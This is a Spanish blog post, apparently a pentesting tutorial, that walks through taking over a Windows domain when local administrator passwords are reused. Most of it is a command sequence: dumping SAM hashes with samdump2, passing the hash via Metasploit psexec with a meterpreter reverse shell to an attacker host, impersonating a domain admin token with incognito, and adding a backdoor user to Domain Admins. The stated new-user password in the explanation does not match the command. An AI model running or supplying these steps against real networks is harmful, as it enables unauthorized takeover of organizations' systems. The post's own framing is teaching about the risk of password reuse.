¿Cómo tomar control de un Dominio en Windows?

Los “dominios” en windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y seguridad, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la clave que usan para el usuario administrador de un equipo en los dominios de windows.

En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente:

REQUISITOS

  • Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)
  • Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave
  • Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)
  • Una copia de BackTrack 4

Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:

Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos:

  • mount /dev/sda1 /mnt/sda1
    Montamos la particion de la maquina windows
  • cd /mnt/sda1/WINDOWS/system32/config
    accedemos a la carpeta dodne se encuentra el archivo SAM
  • samdump2 system SAM
    sacamos los hash de los usuarios en la maquina windows
  • msfconsole
    ejecutamos el metasploit por consola
  • use windows/smb/psexec
    utilizamos el psexec
  • exploit -p windows/meterpreter/reverse_tcp -o
    utilizamos la shell meterpreter
  • LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j
    configuramos las opciones del exploit
  • sessions -i 1
    una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra
  • use incognito
    utilizamos el modulo incognito de meterpreter
  • list_tokens -u
    mostramos los tokens
  • impersonate_token mydomain\\domainadmin
    tomamos las credenciales del administrador de dominio
  • execute -f cmd.exe -i -t
    lanzamos la consola de windows
  • net user hack MPass5678 /add /domain
    Agregamos el usuario “hack” con clave “MPass46782” al dominio
  • net group “Domain Admins” hack /add /domain
    metemos el usuario hack al grupo de administradores de dominio
  • Ya hemos tomado el control del dominio de windows

Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean.

PD. en Securitytube.net existe un vídeo en el que realizan este mismo procedimiento un poco mas “a mano” pero que puede servirnos también en nuestro proceso de aprendizaje.


Si te ha gustado el post, compartelo y ayudanos a crecer.

Unete a nuestra Fanpage Siguenos en Twitter

Autor: DragoN

Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales. Information Security Researcher con más de 10 años de experiencias en Ethical Hacking, Pen Testing y Análisis Forense. Docente Universitario en Pre y Post-Grado, Speaker y Organizador de diferentes eventos de Seguridad Informática, Fundador del DragonJAR Security Conference y Fundador de DragonJAR SAS y de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.

Compartir este Artículo

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES